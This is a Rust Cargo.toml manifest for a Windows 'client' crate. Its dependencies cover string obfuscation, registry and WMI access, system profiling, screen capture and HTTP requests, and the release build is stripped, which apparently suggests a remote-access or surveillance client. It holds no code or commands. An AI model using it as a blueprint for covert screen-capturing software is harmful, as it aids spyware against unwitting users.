[package]
name = "client"
version = "0.1.0"
edition = "2021"

[profile.release]
opt-level = 3
lto = true
strip = true
debug = false
codegen-units = 1
debug-assertions = false
incremental = false
panic = "abort"

[package.metadata.cargo-post.dependencies]
regex = "1"
memmap2 = "0.9"
walkdir = "2"
rand = "0.8"

[build-dependencies]
rand = "0.8"

[dependencies]
tokio = { version = "1", features = ["full"] }
shared = { path = "../shared" }
client_vars = { path = "../client_vars" }
lazy_static = "1"
obfstr = "0.4"
anyhow = "1"
winreg = "0.55"
wmi = "0.14"
serde = "1"
winapi = { version = "0.3.9", features = [
    # "processthreadsapi",
    # "securitybaseapi",
    # "windef",
    # "psapi",
    # "shellapi",
    # "winuser",
    # "winbase",
    # "winerror",
    # "errhandlingapi",
    # "handleapi",
    # "tlhelp32",
    # "winsvc",
    # "debugapi",
    "memoryapi",
    "jobapi2",
] }
serde_json = "1"
sysinfo = "0.33"
screenshots = "0.8"
reqwest = "0.12"
futures = "0.3"
webp = "0.3"
